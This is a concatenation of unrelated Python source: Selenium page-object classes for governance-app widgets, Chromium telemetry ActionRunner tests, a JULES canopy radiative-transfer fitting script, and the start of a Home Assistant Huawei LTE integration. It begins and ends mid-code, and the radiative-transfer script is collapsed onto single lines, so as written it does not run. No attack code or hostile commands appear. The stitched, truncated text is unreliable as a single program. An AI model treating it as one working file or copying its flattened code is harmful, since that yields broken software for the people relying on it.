        self._driver, self._locator.BUTTON_START_NEW_PROGRAM)
    self.button_start_new_audit = base.Button(
        self._driver, self._locator.BUTTON_START_NEW_AUDIT)
    self.button_start_new_workflow = base.Button(
        self._driver, self._locator.BUTTON_START_NEW_WORKFLOW)
    self.button_create_new_object = base.Button(
        self._driver, self._locator.BUTTON_CREATE_NEW_OBJECT)
    self.button_all_objects = base.Button(
        self._driver, self._locator.BUTTON_ALL_OBJECTS)

  # The actions below are placeholders: the buttons exist but the page-object
  # behaviors have not been implemented yet.
  def start_new_program(self):
    raise NotImplementedError

  def start_new_audit(self):
    raise NotImplementedError

  def start_new_workflow(self):
    raise NotImplementedError

  def create_new_object(self):
    raise NotImplementedError

  def browse_all_objects(self):
    raise NotImplementedError


class Programs(Widget):
  """Model for program object info widget"""
  _locator = locator.WidgetInfoProgram
  _dropdown_settings_cls = widget_info.Programs

  def __init__(self, driver):
    """
    Args:
        driver (base.CustomDriver)
    """
    super(Programs, self).__init__(driver)
    self.show_advanced = base.Toggle(
        self._driver, self._locator.TOGGLE_SHOW_ADVANCED)
    # activate all fields
    self.show_advanced.toggle()
    self.object_review = base.Label(
        self._driver, self._locator.OBJECT_REVIEW)
    self.submit_for_review = base.Label(
        self._driver, self._locator.SUBMIT_FOR_REVIEW)
    # Each attribute below pairs a field caption label with the entered value.
    self.description = base.Label(self._driver, self._locator.DESCRIPTION)
    self.description_entered = base.Label(
        self._driver, self._locator.DESCRIPTION_ENTERED)
    self.notes = base.Label(self._driver, self._locator.NOTES)
    self.notes_entered = base.Label(
        self._driver, self._locator.NOTES_ENTERED)
    self.manager = base.Label(self._driver, self._locator.MANAGER)
    self.manager_entered = base.Label(
        self._driver, self._locator.MANAGER_ENTERED)
    self.program_url = base.Label(self._driver, self._locator.PROGRAM_URL)
    self.program_url_entered = base.Label(
        self._driver, self._locator.PROGRAM_URL_ENTERED)
    self.code = base.Label(self._driver, self._locator.CODE)
    self.code_entered = base.Label(
        self._driver, self._locator.CODE_ENTERED)
    self.effective_date = base.Label(
        self._driver, self._locator.EFFECTIVE_DATE)
    self.effective_date_entered = base.Label(
        self._driver, self._locator.EFFECTIVE_DATE_ENTERED)
    self.stop_date = base.Label(self._driver, self._locator.STOP_DATE)
    self.stop_date_entered = base.Label(
        self._driver, self._locator.STOP_DATE_ENTERED)
    self.primary_contact = base.Label(
        self._driver, self._locator.PRIMARY_CONTACT)
    self.primary_contact_entered = base.Label(
        self._driver, self._locator.PRIMARY_CONTACT_ENTERED)
    self.secondary_contact = base.Label(
        self._driver, self._locator.SECONDARY_CONTACT)
    self.secondary_contact_entered = base.Label(
        self._driver, self._locator.SECONDARY_CONTACT_ENTERED)
    self.reference_url = base.Label(
        self._driver, self._locator.REFERENCE_URL)
    self.reference_url_entered = base.Label(
        self._driver, self._locator.REFERENCE_URL_ENTERED)


class Workflows(Widget):
  """Model for
workflow object info widget"""
  _locator = locator.WidgetInfoWorkflow


class Audits(Widget):
  """Model for audit object info widget"""
  _locator = locator.WidgetInfoAudit


class Assessments(Widget):
  """Model for assessment object info widget"""
  _locator = locator.WidgetInfoAssessment


class Requests(Widget):
  """Model for request object info widget"""
  _locator = locator.WidgetInfoRequest


class Issues(Widget):
  """Model for issue object info widget"""
  _locator = locator.WidgetInfoIssue


class Regulations(Widget):
  """Model for regulation object info widget"""
  _locator = locator.WidgetInfoRegulations


class Policies(Widget):
  """Model for policies object info widget"""
  _locator = locator.WidgetInfoPolicy


class Standards(Widget):
  """Model for standard object info widget"""
  _locator = locator.WidgetInfoStandard


class Contracts(Widget):
  """Model for contract object info widget"""
  _locator = locator.WidgetInfoContract


class Clauses(Widget):
  """Model for clause object info widget"""
  _locator = locator.WidgetInfoClause


class Sections(Widget):
  """Model for section object info widget"""
  _locator = locator.WidgetInfoSection


class Controls(Widget):
  """Model for control object info widget"""
  _locator = locator.WidgetInfoControl
  _dropdown_settings_cls = widget_info.Controls


class Objectives(Widget):
  """Model for objectives object info widget"""
  _locator = locator.WidgetInfoObjective


class People(base.Widget):
  """Model for people object info widget"""
  # NOTE(review): subclasses base.Widget directly, unlike its siblings which
  # subclass the local Widget (with the settings button) — confirm intentional.
  _locator = locator.WidgetInfoPeople


class OrgGroups(Widget):
  """Model for org groups object info widget"""
  _locator = locator.WidgetInfoOrgGroup
  _dropdown_settings_cls = widget_info.OrgGroups


class Vendors(Widget):
  """Model for vendors object info widget"""
  _locator = locator.WidgetInfoVendor


class AccessGroup(Widget):
  """Model for access group object info widget"""
  _locator = locator.WidgetInfoAccessGroup


class Systems(Widget):
  """Model for system object info widget"""
  _locator = locator.WidgetInfoSystem
  _dropdown_settings_cls = widget_info.Systems


class Processes(Widget):
  """Model for process object info widget"""
  _locator = locator.WidgetInfoProcess
  _dropdown_settings_cls = widget_info.Processes


class DataAssets(Widget):
  """Model for data asset object info widget"""
  _locator = locator.WidgetInfoDataAsset
  _dropdown_settings_cls = widget_info.DataAssets


class Products(Widget):
  """Model for product object info widget"""
  _locator = locator.WidgetInfoProduct
  _dropdown_settings_cls = widget_info.Products


class Projects(Widget):
  """Model for project object info widget"""
  _locator = locator.WidgetInfoProject
  _dropdown_settings_cls = widget_info.Projects


class Facilities(Widget):
  """Model for facility object info widget"""
  _locator = locator.WidgetInfoFacility


class Markets(Widget):
  """Model for market object info widget"""
  _locator = locator.WidgetInfoMarket


class Risks(Widget):
  """Model for risk object info widget"""
  _locator = locator.WidgetInfoRisk


class Threats(Widget):
  """Model for threat object info widget"""
  _locator = locator.WidgetInfoThreat
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

from telemetry import benchmark
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.core.platform import tracing_category_filter
from telemetry.core.platform import tracing_options
from telemetry.page.actions import action_runner as action_runner_module
from telemetry.page.actions import page_action
from telemetry.timeline import model
from telemetry.unittest import tab_test_case
from telemetry.web_perf import timeline_interaction_record as tir_module


class ActionRunnerInteractionTest(tab_test_case.TabTestCase):
  """Verifies that ActionRunner interactions end up as timeline records."""

  def GetInteractionRecords(self, trace_data):
    """Extract TimelineInteractionRecords for this tab from raw trace data."""
    timeline_model = model.TimelineModel(trace_data)
    renderer_thread = timeline_model.GetRendererThreadFromTabId(self._tab.id)
    return [
        tir_module.TimelineInteractionRecord.FromAsyncEvent(e)
        for e in renderer_thread.async_slices
        if tir_module.IsTimelineInteractionRecord(e.name)]

  def VerifyIssuingInteractionRecords(self, **interaction_kwargs):
    """Run one Begin/End interaction under tracing and assert exactly one
    record with the given flags appears on the timeline."""
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)
    self.Navigate('interaction_enabled_page.html')
    action_runner.Wait(1)
    options = tracing_options.TracingOptions()
    options.enable_chrome_trace = True
    self._browser.platform.tracing_controller.Start(
        options, tracing_category_filter.CreateNoOverheadFilter())
    interaction = action_runner.BeginInteraction('InteractionName',
                                                 **interaction_kwargs)
    interaction.End()
    trace_data = self._browser.platform.tracing_controller.Stop()

    records = self.GetInteractionRecords(trace_data)
    self.assertEqual(
        1, len(records),
        'Failed to issue the interaction record on the tracing timeline.'
        ' Trace data:\n%s' % repr(trace_data.EventData()))
    self.assertEqual('InteractionName', records[0].label)
    # Each keyword flag passed to BeginInteraction must round-trip onto the
    # resulting record as a truthy attribute.
    for attribute_name in interaction_kwargs:
      self.assertTrue(getattr(records[0], attribute_name))

  @benchmark.Disabled('chromeos')
  def testIssuingMultipleMeasurementInteractionRecords(self):
    self.VerifyIssuingInteractionRecords(is_fast=True)
    self.VerifyIssuingInteractionRecords(is_responsive=True)
    self.VerifyIssuingInteractionRecords(is_smooth=True)
    self.VerifyIssuingInteractionRecords(is_fast=True, is_smooth=True)


class ActionRunnerTest(tab_test_case.TabTestCase):
  """Exercises the individual ActionRunner actions against test pages."""

  def testExecuteJavaScript(self):
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)
    self.Navigate('blank.html')
    action_runner.ExecuteJavaScript('var testing = 42;')
    self.assertEqual(42, self._tab.EvaluateJavaScript('testing'))

  def testWaitForNavigate(self):
    self.Navigate('page_with_link.html')
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)
    action_runner.ClickElement('#clickme')
    action_runner.WaitForNavigate()

    # After the navigation the document must at least be parsed...
    self.assertTrue(self._tab.EvaluateJavaScript(
        'document.readyState == "interactive" || '
        'document.readyState == "complete"'))
    # ...and we must have landed on the link's target page.
    self.assertEqual(
        self._tab.EvaluateJavaScript('document.location.pathname;'),
        '/blank.html')

  def testWait(self):
    # Note: no skip_waits here — this test exercises real waiting.
    action_runner = action_runner_module.ActionRunner(self._tab)
    self.Navigate('blank.html')

    action_runner.ExecuteJavaScript(
        'window.setTimeout(function() { window.testing = 101; }, 50);')
    action_runner.Wait(0.1)
    self.assertEqual(101, self._tab.EvaluateJavaScript('window.testing'))

    action_runner.ExecuteJavaScript(
        'window.setTimeout(function() { window.testing = 102; }, 100);')
    action_runner.Wait(0.2)
    self.assertEqual(102, self._tab.EvaluateJavaScript('window.testing'))

  def testWaitForJavaScriptCondition(self):
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)
    self.Navigate('blank.html')

    # Condition already true: should return immediately.
    action_runner.ExecuteJavaScript('window.testing = 219;')
    action_runner.WaitForJavaScriptCondition(
        'window.testing == 219', timeout_in_seconds=0.1)
    # Condition becomes true later: should poll until it does.
    action_runner.ExecuteJavaScript(
        'window.setTimeout(function() { window.testing = 220; }, 50);')
    action_runner.WaitForJavaScriptCondition(
        'window.testing == 220', timeout_in_seconds=0.1)
    self.assertEqual(220, self._tab.EvaluateJavaScript('window.testing'))

  def testWaitForElement(self):
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)
    self.Navigate('blank.html')

    # Element present up-front: selector, text, and element_function lookups.
    action_runner.ExecuteJavaScript(
        '(function() {'
        '  var el = document.createElement("div");'
        '  el.id = "test1";'
        '  el.textContent = "foo";'
        '  document.body.appendChild(el);'
        '})()')
    action_runner.WaitForElement('#test1', timeout_in_seconds=0.1)
    action_runner.WaitForElement(text='foo', timeout_in_seconds=0.1)
    action_runner.WaitForElement(
        element_function='document.getElementById("test1")')
    # Element appears asynchronously: each lookup mode must poll.
    action_runner.ExecuteJavaScript(
        'window.setTimeout(function() {'
        '  var el = document.createElement("div");'
        '  el.id = "test2";'
        '  document.body.appendChild(el);'
        '}, 50)')
    action_runner.WaitForElement('#test2', timeout_in_seconds=0.1)
    action_runner.ExecuteJavaScript(
        'window.setTimeout(function() {'
        '  document.getElementById("test2").textContent = "bar";'
        '}, 50)')
    action_runner.WaitForElement(text='bar', timeout_in_seconds=0.1)
    action_runner.ExecuteJavaScript(
        'window.setTimeout(function() {'
        '  var el = document.createElement("div");'
        '  el.id = "test3";'
        '  document.body.appendChild(el);'
        '}, 50)')
    action_runner.WaitForElement(
        element_function='document.getElementById("test3")')

  def testWaitForElementWithWrongText(self):
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)
    self.Navigate('blank.html')
    action_runner.ExecuteJavaScript(
        '(function() {'
        '  var el = document.createElement("div");'
        '  el.id = "test1";'
        '  el.textContent = "foo";'
        '  document.body.appendChild(el);'
        '})()')
    action_runner.WaitForElement('#test1', timeout_in_seconds=0.2)
    # Text matching is exact: a substring ('oo') must NOT match and should
    # time out.
    def WaitForElement():
      action_runner.WaitForElement(text='oo', timeout_in_seconds=0.2)
    self.assertRaises(util.TimeoutException, WaitForElement)

  def testClickElement(self):
    self.Navigate('page_with_clickables.html')
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)

    # The test page copies valueSettableByTest into valueToTest on click, so
    # each assertion proves the click actually landed.
    action_runner.ExecuteJavaScript('valueSettableByTest = 1;')
    action_runner.ClickElement('#test')
    self.assertEqual(1, action_runner.EvaluateJavaScript('valueToTest'))

    action_runner.ExecuteJavaScript('valueSettableByTest = 2;')
    action_runner.ClickElement(text='Click/tap me')
    self.assertEqual(2, action_runner.EvaluateJavaScript('valueToTest'))

    action_runner.ExecuteJavaScript('valueSettableByTest = 3;')
    action_runner.ClickElement(
        element_function='document.body.firstElementChild;')
    self.assertEqual(3, action_runner.EvaluateJavaScript('valueToTest'))

    def WillFail():
      action_runner.ClickElement('#notfound')
    self.assertRaises(exceptions.EvaluateException, WillFail)

  @benchmark.Disabled('debug')
  def testTapElement(self):
    self.Navigate('page_with_clickables.html')
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)

    action_runner.ExecuteJavaScript('valueSettableByTest = 1;')
    action_runner.TapElement('#test')
    self.assertEqual(1, action_runner.EvaluateJavaScript('valueToTest'))

    action_runner.ExecuteJavaScript('valueSettableByTest = 2;')
    action_runner.TapElement(text='Click/tap me')
    self.assertEqual(2, action_runner.EvaluateJavaScript('valueToTest'))

    action_runner.ExecuteJavaScript('valueSettableByTest = 3;')
    action_runner.TapElement(
        element_function='document.body.firstElementChild')
    self.assertEqual(3, action_runner.EvaluateJavaScript('valueToTest'))

    def WillFail():
      action_runner.TapElement('#notfound')
    self.assertRaises(exceptions.EvaluateException, WillFail)

  def testScroll(self):
    # Scroll gestures require touch support; skip silently otherwise.
    if not page_action.IsGestureSourceTypeSupported(
        self._tab, 'touch'):
      return

    self.Navigate('page_with_swipeables.html')
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)

    action_runner.ScrollElement(
        selector='#left-right', direction='right', left_start_ratio=0.9)
    self.assertTrue(action_runner.EvaluateJavaScript(
        'document.querySelector("#left-right").scrollLeft') > 75)
    action_runner.ScrollElement(
        selector='#top-bottom', direction='down', top_start_ratio=0.9)
    self.assertTrue(action_runner.EvaluateJavaScript(
        'document.querySelector("#top-bottom").scrollTop') > 75)

    action_runner.ScrollPage(direction='right', left_start_ratio=0.9,
                             distance=100)
    self.assertTrue(action_runner.EvaluateJavaScript(
        'document.body.scrollLeft') > 75)

  def testSwipe(self):
    # Swipe gestures require touch support; skip silently otherwise.
    if not page_action.IsGestureSourceTypeSupported(
        self._tab, 'touch'):
      return

    self.Navigate('page_with_swipeables.html')
    action_runner = action_runner_module.ActionRunner(self._tab,
                                                      skip_waits=True)

    action_runner.SwipeElement(
        selector='#left-right', direction='left', left_start_ratio=0.9)
    self.assertTrue(action_runner.EvaluateJavaScript(
        'document.querySelector("#left-right").scrollLeft') > 75)
    action_runner.SwipeElement(
        selector='#top-bottom', direction='up', top_start_ratio=0.9)
    self.assertTrue(action_runner.EvaluateJavaScript(
        'document.querySelector("#top-bottom").scrollTop') > 75)

    action_runner.SwipePage(direction='left', left_start_ratio=0.9)
    self.assertTrue(action_runner.EvaluateJavaScript(
        'document.body.scrollLeft') > 75)
from library_rami4pilps import * #from foo1 import * from RAMI4PILPS_reference_values import * from invertJulesRT_new import * from copy import copy from array import array from pylab import * from runJulesRTStruct import runJulesRTStruct import numpy as np import matplotlib.pyplot as plt controlData=[] # Sparse canopy #Absorbed PAR controlData.append(OFC_FABS_PAR_050_BLK_27) controlData.append(OFC_FABS_PAR_050_BLK_60) controlData.append(OFC_FABS_PAR_050_BLK_83) controlData.append(OFC_FABS_PAR_050_BLK_99) controlData.append(OFC_FABS_PAR_050_MED_27) controlData.append(OFC_FABS_PAR_050_MED_60) controlData.append(OFC_FABS_PAR_050_MED_83) controlData.append(OFC_FABS_PAR_050_MED_99) controlData.append(OFC_FABS_PAR_050_SNW_27) controlData.append(OFC_FABS_PAR_050_SNW_60) controlData.append(OFC_FABS_PAR_050_SNW_83) controlData.append(OFC_FABS_PAR_050_SNW_99) #Reflected PAR controlData.append(OFC_FREF_PAR_050_BLK_27) controlData.append(OFC_FREF_PAR_050_BLK_60) controlData.append(OFC_FREF_PAR_050_BLK_83) controlData.append(OFC_FREF_PAR_050_BLK_99) controlData.append(OFC_FREF_PAR_050_MED_27) controlData.append(OFC_FREF_PAR_050_MED_60) controlData.append(OFC_FREF_PAR_050_MED_83) controlData.append(OFC_FREF_PAR_050_MED_99) controlData.append(OFC_FREF_PAR_050_SNW_27) controlData.append(OFC_FREF_PAR_050_SNW_60) controlData.append(OFC_FREF_PAR_050_SNW_83) controlData.append(OFC_FREF_PAR_050_SNW_99) #Absorbed NIR #controlData.append(OFC_FABS_NIR_050_BLK_27) #controlData.append(OFC_FABS_NIR_050_BLK_60) #controlData.append(OFC_FABS_NIR_050_BLK_83) #controlData.append(OFC_FABS_NIR_050_BLK_99) #controlData.append(OFC_FABS_NIR_050_MED_27) #controlData.append(OFC_FABS_NIR_050_MED_60) #controlData.append(OFC_FABS_NIR_050_MED_83) #controlData.append(OFC_FABS_NIR_050_MED_99) #controlData.append(OFC_FABS_NIR_050_SNW_27) #controlData.append(OFC_FABS_NIR_050_SNW_60) #controlData.append(OFC_FABS_NIR_050_SNW_83) #controlData.append(OFC_FABS_NIR_050_SNW_99) #Reflected NIR 
#controlData.append(OFC_FREF_NIR_050_BLK_27) #controlData.append(OFC_FREF_NIR_050_BLK_60) #controlData.append(OFC_FREF_NIR_050_BLK_83) #controlData.append(OFC_FREF_NIR_050_BLK_99) #controlData.append(OFC_FREF_NIR_050_MED_27) #controlData.append(OFC_FREF_NIR_050_MED_60) #controlData.append(OFC_FREF_NIR_050_MED_83) #controlData.append(OFC_FREF_NIR_050_MED_99) #controlData.append(OFC_FREF_NIR_050_SNW_27) #controlData.append(OFC_FREF_NIR_050_SNW_60) #controlData.append(OFC_FREF_NIR_050_SNW_83) #controlData.append(OFC_FREF_NIR_050_SNW_99) #Medium canopy #Absorbed PAR #controlData.append(OFC_FABS_PAR_150_BLK_27) #controlData.append(OFC_FABS_PAR_150_BLK_60) #controlData.append(OFC_FABS_PAR_150_BLK_83) #controlData.append(OFC_FABS_PAR_150_BLK_99) #controlData.append(OFC_FABS_PAR_150_MED_27) #controlData.append(OFC_FABS_PAR_150_MED_60) #controlData.append(OFC_FABS_PAR_150_MED_83) #controlData.append(OFC_FABS_PAR_150_MED_99) #controlData.append(OFC_FABS_PAR_150_SNW_27) #controlData.append(OFC_FABS_PAR_150_SNW_60) #controlData.append(OFC_FABS_PAR_150_SNW_83) #controlData.append(OFC_FABS_PAR_150_SNW_99) #Reflected PAR #controlData.append(OFC_FREF_PAR_150_BLK_27) #controlData.append(OFC_FREF_PAR_150_BLK_60) #controlData.append(OFC_FREF_PAR_150_BLK_83) #controlData.append(OFC_FREF_PAR_150_BLK_99) #controlData.append(OFC_FREF_PAR_150_MED_27) #controlData.append(OFC_FREF_PAR_150_MED_60) #controlData.append(OFC_FREF_PAR_150_MED_83) #controlData.append(OFC_FREF_PAR_150_MED_99) #controlData.append(OFC_FREF_PAR_150_SNW_27) #controlData.append(OFC_FREF_PAR_150_SNW_60) #controlData.append(OFC_FREF_PAR_150_SNW_83) #controlData.append(OFC_FREF_PAR_150_SNW_99) #Absorbed NIR #controlData.append(OFC_FABS_NIR_150_BLK_27) #controlData.append(OFC_FABS_NIR_150_BLK_60) #controlData.append(OFC_FABS_NIR_150_BLK_83) #controlData.append(OFC_FABS_NIR_150_BLK_99) #controlData.append(OFC_FABS_NIR_150_MED_27) #controlData.append(OFC_FABS_NIR_150_MED_60) #controlData.append(OFC_FABS_NIR_150_MED_83) 
#controlData.append(OFC_FABS_NIR_150_MED_99) #controlData.append(OFC_FABS_NIR_150_SNW_27) #controlData.append(OFC_FABS_NIR_150_SNW_60) #controlData.append(OFC_FABS_NIR_150_SNW_83) #controlData.append(OFC_FABS_NIR_150_SNW_99) #Reflected NIR #controlData.append(OFC_FREF_NIR_150_BLK_27) #controlData.append(OFC_FREF_NIR_150_BLK_60) #controlData.append(OFC_FREF_NIR_150_BLK_83) #controlData.append(OFC_FREF_NIR_150_BLK_99) #controlData.append(OFC_FREF_NIR_150_MED_27) #controlData.append(OFC_FREF_NIR_150_MED_60) #controlData.append(OFC_FREF_NIR_150_MED_83) #controlData.append(OFC_FREF_NIR_150_MED_99) #controlData.append(OFC_FREF_NIR_150_SNW_27) #controlData.append(OFC_FREF_NIR_150_SNW_60) #controlData.append(OFC_FREF_NIR_150_SNW_83) #controlData.append(OFC_FREF_NIR_150_SNW_99) #Dense canopy #Absorbed PAR #controlData.append(OFC_FABS_PAR_250_BLK_27) #controlData.append(OFC_FABS_PAR_250_BLK_60) #controlData.append(OFC_FABS_PAR_250_BLK_83) #controlData.append(OFC_FABS_PAR_250_BLK_99) #controlData.append(OFC_FABS_PAR_250_MED_27) #controlData.append(OFC_FABS_PAR_250_MED_60) #controlData.append(OFC_FABS_PAR_250_MED_83) #controlData.append(OFC_FABS_PAR_250_MED_99) #controlData.append(OFC_FABS_PAR_250_SNW_27) #controlData.append(OFC_FABS_PAR_250_SNW_60) #controlData.append(OFC_FABS_PAR_250_SNW_83) #controlData.append(OFC_FABS_PAR_250_SNW_99) #Reflected PAR #controlData.append(OFC_FREF_PAR_250_BLK_27) #controlData.append(OFC_FREF_PAR_250_BLK_60) #controlData.append(OFC_FREF_PAR_250_BLK_83) #controlData.append(OFC_FREF_PAR_250_BLK_99) #controlData.append(OFC_FREF_PAR_250_MED_27) #controlData.append(OFC_FREF_PAR_250_MED_60) #controlData.append(OFC_FREF_PAR_250_MED_83) #controlData.append(OFC_FREF_PAR_250_MED_99) #controlData.append(OFC_FREF_PAR_250_SNW_27) #controlData.append(OFC_FREF_PAR_250_SNW_60) #controlData.append(OFC_FREF_PAR_250_SNW_83) #controlData.append(OFC_FREF_PAR_250_SNW_99) #Absorbed NIR #controlData.append(OFC_FABS_NIR_250_BLK_27) 
#controlData.append(OFC_FABS_NIR_250_BLK_60) #controlData.append(OFC_FABS_NIR_250_BLK_83) #controlData.append(OFC_FABS_NIR_250_BLK_99) #controlData.append(OFC_FABS_NIR_250_MED_27) #controlData.append(OFC_FABS_NIR_250_MED_60) #controlData.append(OFC_FABS_NIR_250_MED_83) #controlData.append(OFC_FABS_NIR_250_MED_99) #controlData.append(OFC_FABS_NIR_250_SNW_27) #controlData.append(OFC_FABS_NIR_250_SNW_60) #controlData.append(OFC_FABS_NIR_250_SNW_83) #controlData.append(OFC_FABS_NIR_250_SNW_99) #Reflected NIR #controlData.append(OFC_FREF_NIR_250_BLK_27) #controlData.append(OFC_FREF_NIR_250_BLK_60) #controlData.append(OFC_FREF_NIR_250_BLK_83) #controlData.append(OFC_FREF_NIR_250_BLK_99) #controlData.append(OFC_FREF_NIR_250_MED_27) #controlData.append(OFC_FREF_NIR_250_MED_60) #controlData.append(OFC_FREF_NIR_250_MED_83) #controlData.append(OFC_FREF_NIR_250_MED_99) #controlData.append(OFC_FREF_NIR_250_SNW_27) #controlData.append(OFC_FREF_NIR_250_SNW_60) #controlData.append(OFC_FREF_NIR_250_SNW_83) #controlData.append(OFC_FREF_NIR_250_SNW_99) [a,b]=solveJulesStruct(controlData,initParams=np.array([1.0,0.0])) [a,b]=solveJulesStruct(controlData,[a,b]) x = [] jules_str = [] jules_ori = [] #type here your own structure factor parameters #[a,b]=[0.34346912,0.09578224] print a,b for sza in range (0,90): x.append(sza),jules_str.append(runJulesRTStruct(sza=sza,astruc=a,bstruc=b,lai=0.50265, soilR=0.9640, leafR=0.0735, leafT=0.0566, diffuse=False, uniform=True)),jules_ori.append(runJulesRTStruct(sza=sza,astruc=1.0,bstruc=0.0,lai=0.50265, soilR=0.9640, leafR=0.0735, leafT=0.0566, diffuse=False, uniform=True)) #print x #print y fapar_str = tuple(x[0] for x in jules_str) albedo_str = tuple(x[1] for x in jules_str) fapar_ori = tuple(x[0] for x in jules_ori) albedo_ori = tuple(x[1] for x in jules_ori) forwardModel=copy(controlData) #addTwinObs(forwardModel,astruc=a,bstruc=b) #figure title('Nonsense') xlabel('x-stuff') ylabel('y-stuff') plt.grid() plt.legend() # the scatter plot: 
axScatter = plt.subplot(111) axScatter.scatter(x, albedo_ori,label='Two-stream') # set axes range plt.xlim(0, 90) plt.ylim(0, 1) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_NIR_OFC_050_BLK, color='Y', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_NIR_OFC_050_MED, color='Y', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_NIR_OFC_050_SNW, color='Y', marker='x', s=300) plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fref_PAR_OFC_050_SNW, color='Y', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_PAR_OFC_050_BLK, color='R', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_PAR_OFC_050_MED, color='R', marker='x', s=300) #plt.scatter(SZA_RAMI4PILPS,RAMI4PILPS_fabs_PAR_OFC_050_SNW, color='R', marker='x', s=300) plt.scatter(x, albedo_str, alpha=0.5,label='Structure') plt.show()
"""Support for Huawei LTE routers.""" from collections import defaultdict from datetime import timedelta from functools import partial import ipaddress import logging from typing import Any, Callable, Dict, List, Set, Tuple from urllib.parse import urlparse import attr from getmac import get_mac_address from huawei_lte_api.AuthorizedConnection import AuthorizedConnection from huawei_lte_api.Client import Client from huawei_lte_api.Connection import Connection from huawei_lte_api.exceptions import ( ResponseErrorLoginRequiredException, ResponseErrorNotSupportedException, ) from requests.exceptions import Timeout from url_normalize import url_normalize import voluptuous as vol from homeassistant.components.binary_sensor import DOMAIN as BINARY_SENSOR_DOMAIN from homeassistant.components.device_tracker import DOMAIN as DEVICE_TRACKER_DOMAIN from homeassistant.components.notify import DOMAIN as NOTIFY_DOMAIN from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN from homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN from homeassistant.config_entries import SOURCE_IMPORT, ConfigEntry from homeassistant.const import ( CONF_NAME, CONF_PASSWORD, CONF_RECIPIENT, CONF_URL, CONF_USERNAME, EVENT_HOMEASSISTANT_STOP, ) from homeassistant.core import CALLBACK_TYPE from homeassistant.exceptions import ConfigEntryNotReady from homeassistant.helpers import ( config_validation as cv, device_registry as dr, discovery, ) from homeassistant.helpers.dispatcher import ( async_dispatcher_connect, async_dispatcher_send, dispatcher_send, ) from homeassistant.helpers.entity import Entity from homeassistant.helpers.event import async_track_time_interval from homeassistant.helpers.typing import HomeAssistantType from .const import ( ADMIN_SERVICES, ALL_KEYS, CONNECTION_TIMEOUT, DEFAULT_DEVICE_NAME, DEFAULT_NOTIFY_SERVICE_NAME, DOMAIN, KEY_DEVICE_BASIC_INFORMATION, KEY_DEVICE_INFORMATION, KEY_DEVICE_SIGNAL, KEY_DIALUP_MOBILE_DATASWITCH, KEY_MONITORING_STATUS, 
KEY_MONITORING_TRAFFIC_STATISTICS, KEY_WLAN_HOST_LIST, SERVICE_CLEAR_TRAFFIC_STATISTICS, SERVICE_REBOOT, SERVICE_RESUME_INTEGRATION, SERVICE_SUSPEND_INTEGRATION, UPDATE_OPTIONS_SIGNAL, UPDATE_SIGNAL, ) _LOGGER = logging.getLogger(__name__) # dicttoxml (used by huawei-lte-api) has uselessly verbose INFO level. # https://github.com/quandyfactory/dicttoxml/issues/60 logging.getLogger("dicttoxml").setLevel(logging.WARNING) DEFAULT_NAME_TEMPLATE = "Huawei {} {}" SCAN_INTERVAL = timedelta(seconds=10) NOTIFY_SCHEMA = vol.Any( None, vol.Schema( { vol.Optional(CONF_NAME): cv.string, vol.Optional(CONF_RECIPIENT): vol.Any( None, vol.All(cv.ensure_list, [cv.string]) ), } ), ) CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.All( cv.ensure_list, [ vol.Schema( { vol.Required(CONF_URL): cv.url, vol.Optional(CONF_USERNAME): cv.string, vol.Optional(CONF_PASSWORD): cv.string, vol.Optional(NOTIFY_DOMAIN): NOTIFY_SCHEMA, } ) ], ) }, extra=vol.ALLOW_EXTRA, ) SERVICE_SCHEMA = vol.Schema({vol.Optional(CONF_URL): cv.url}) CONFIG_ENTRY_PLATFORMS = ( BINARY_SENSOR_DOMAIN, DEVICE_TRACKER_DOMAIN, SENSOR_DOMAIN, SWITCH_DOMAIN, ) @attr.s class Router: """Class for router state.""" connection: Connection = attr.ib() url: str = attr.ib() mac: str = attr.ib() signal_update: CALLBACK_TYPE = attr.ib() data: Dict[str, Any] = attr.ib(init=False, factory=dict) subscriptions: Dict[str, Set[str]] = attr.ib( init=False, factory=lambda: defaultdict(set, ((x, {"initial_scan"}) for x in ALL_KEYS)), ) unload_handlers: List[CALLBACK_TYPE] = attr.ib(init=False, factory=list) client: Client suspended = attr.ib(init=False, default=False) def __attrs_post_init__(self): """Set up internal state on init.""" self.client = Client(self.connection) @property def device_name(self) -> str: """Get router device name.""" for key, item in ( (KEY_DEVICE_BASIC_INFORMATION, "devicename"), (KEY_DEVICE_INFORMATION, "DeviceName"), ): try: return self.data[key][item] except (KeyError, TypeError): pass return DEFAULT_DEVICE_NAME @property 
